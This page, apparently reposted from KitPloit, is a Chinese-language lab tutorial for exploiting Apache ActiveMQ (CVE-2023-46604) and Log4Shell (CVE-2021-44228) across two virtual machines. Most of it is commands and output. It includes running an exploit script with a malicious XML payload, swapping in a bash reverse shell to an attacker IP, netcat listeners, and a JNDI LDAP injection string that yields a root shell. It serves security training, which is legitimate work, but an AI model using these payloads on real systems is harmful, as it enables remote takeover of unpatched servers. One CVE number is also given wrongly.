Sploitus

Exploit for CVE-Lab

kitploit · 2026-09-04

Exploit Code

MARKDOWN338 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DCM2406-CVE-LAB
# CVE-2023-46604 实验

本实验指导如何利用 CVE-2023-46604 漏洞。

## 致谢

  * Apache ActiveMQ
  * CVE-2023-46604



## 环境

本实验需要安装两台虚拟机:一台 Kali Linux 2023.4 版,一台 Ubuntu 22.04.3 LTS 版。您可以通过以下链接下载:

  * Kali Linux 2023.4
  * Ubuntu 22.04.3 LTS
  * VMware-workstation-17.5.0 for windows
  * VMware-workstation-17.5.0 for linux



## 模型与系统要求

![](https://raw.githubusercontent.com/dcm2406/CVE-Lab/master/model.png)

**在 Kali Linux 虚拟机上:**

安装 git

root@kitploit:~
    
    
    $sudo apt install git
    

安装 gedit

root@kitploit:~
    
    
    $sudo apt install gedit
    

**在 Ubuntu 虚拟机上:**

安装 git

root@kitploit:~
    
    
    $sudo apt install git
    

安装 openjdk 18

root@kitploit:~
    
    
    $sudo apt install openjdk-18-jdk
    

安装 ActiveMQ 5.18.2 包

root@kitploit:~
    
    
    $sudo su
    $git clone https://github.com/dcm2406/ApacheActiveMQ
    $cd ApacheActiveMQ/
    $tar -xf apache-activemq-5.18.2-bin.tar.gz
    

## 构建服务器(启动 activemq 服务)

在 Ubuntu 虚拟机上 打开终端窗口,按如下命令运行:

root@kitploit:~
    
    
    $sudo su
    $cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
    $./activemq start
    

检查服务状态:

root@kitploit:~
    
    
    $./activemq status
    

如果服务成功启动,终端屏幕将显示 "ActiveMQ Brocker is running"。

您还可以访问 http://127.0.0.1:8161 打开 ActiveMQ 代理管理器。其中包含主机名、版本、ID、运行时间及其他信息。

## 利用

在 Kali Linux 虚拟机上

下载利用过程所需的资源:

root@kitploit:~
    
    
    $sudo su
    $git clone https://github.com/dcm2406/CVE-2023-46604
    $cd CVE-2023-46604
    $ls
    

如您所见,我们有两个文件:exploit.py 和 poc.xml:

  * poc.xml 文件包含一段恶意代码,用于利用 OpenWire 协议中的漏洞。
  * exploit.py 文件负责进行 HTTP 加密并将 poc.xml 文件发送到目标机器上的代理。 在资源路径下打开一个 Web 服务器:



root@kitploit:~
    
    
    $cd CVE-2023-46604
    $python3 -m http.server
    

打开一个新终端窗口,通过 exploit.py 文件将 poc.xml 发送到目标服务器:

root@kitploit:~
    
    
    $sudo su
    $cd CVE-2023-46604
    $python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml
    

命令执行后,目标机器上会启动计算器应用程序。这证明漏洞已被成功利用。接下来我们创建反弹 shell 来控制目标机器。

打开一个新终端窗口,监听反弹 shell 连接:

root@kitploit:~
    
    
    $sudo su
    $nc -nlvp 4444
    

返回上一个终端,编辑 poc.xml 文件:

root@kitploit:~
    
    
    $gedit poc.xml
    

将 **gnome-calculator** 值替换为 **bash -i >& /dev/tcp/192.168.132.130/4444 0>&1** 并保存文件。

再次发送恶意代码:

root@kitploit:~
    
    
    $python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml
    

该命令的结果是我们获得了目标机器的 root shell。已 ROOTED!!!

# CVE-2021-44228 实验

## 致谢

  * Apache log4j
  * CVE-2023-44228 - log4shell



## 环境

本实验需要安装两台虚拟机:一台 Kali Linux 2023.4 版,一台 Ubuntu 22.04.3 LTS 版。您可以通过以下链接下载:

  * Kali Linux 2023.4
  * Ubuntu 22.04.3 LTS
  * VMware-workstation-17.5.0 for windows
  * VMware-workstation-17.5.0 for linux



## 模型与系统要求

![](https://raw.githubusercontent.com/dcm2406/CVE-Lab/master/model.png)

**在 Kali Linux 虚拟机上:**

安装 git

root@kitploit:~
    
    
    $sudo apt install git
    

安装 gedit

root@kitploit:~
    
    
    $sudo apt install gedit
    

**在 Ubuntu 虚拟机上:**

安装 git

root@kitploit:~
    
    
    $sudo apt install git
    

安装 docker

root@kitploit:~
    
    
    $sudo apt install docker.io 
    

## 构建 Web 服务器

在 Ubuntu 虚拟机上

步骤 1:下载 openjdk

root@kitploit:~
    
    
    $sudo su
    $wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
    $tar -xf jdk-8u20-linux-x64.tar.gz
    

步骤 2:下载并构建 docker 文件

root@kitploit:~
    
    
    $sudo su
    $git clone https://github.com/dcm2406/web-server-cve44228
    

root@kitploit:~
    
    
    $docker build -t cve44228
    $docker run --network host cve44228
    

完成以上命令后,我们就有了一个网站。要浏览该网站,您可以使用 URL:http://<ubuntu_ip>:8080。在本教程中,地址形式为:http://192.168.132.135:8080

## 利用

在 Kali Linux 虚拟机上,下载利用漏洞所需的资源

下载 poc

root@kitploit:~
    
    
    $sudo su
    $git clone https://github.com/kozmer/log4j-shell-poc
    $pip install -r requirement.txt
    

下载 openjdk

root@kitploit:~
    
    
    $sudo su
    $wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
    
    //将 openjdk 文件移动到包含 poc 文件的目录
    $mv jdk-8u20-linux-x64.tar.gz <包含 poc 文件的目录路径>
    
    $tar -xf jdk-8u20-linux-x64.tar.gz   //解压文件
    

打开一个新终端,监听反弹 shell 连接:

root@kitploit:~
    
    
    $sudo su
    $nc -nlvp 9001
    

启动 LDAP 和 HTTP 服务(使用 poc 文件)

root@kitploit:~
    
    
    $sudo su
    $cd log4j-shell-poc
    $python3 poc.py --userip 192.168.132.130 --lport 9001 --webport 8080
    

该命令将返回类似以下的结果

root@kitploit:~
    
    
    [!] CVE: CVE-2021-44228
    Github repo: https://github.com/kozmer/log4j-shell-poc
    
    [+] Exploit java class created success
    [+] Setting up LDAP server
    
    [+] Send me: ${jndi:ldap://192.168.132.130:1389/a}
    
    [+] Starting Webserver on port 8080 http://0.0.0.0:8080
    Listening on 0.0.0.0:1389
    

这里,我们只对生成的 jndi 值感兴趣。 打开 Web 浏览器,输入您之前创建的网站地址。 使用 jndi 值登录。此时,netcat 终端将收到连接。 ROOTED!!!

## 文档

CVE 研究报告

## 支持

如有问题,请发送邮件至 some-email@example.com

## 作者

  * @dcm2406
  * @tCu0n9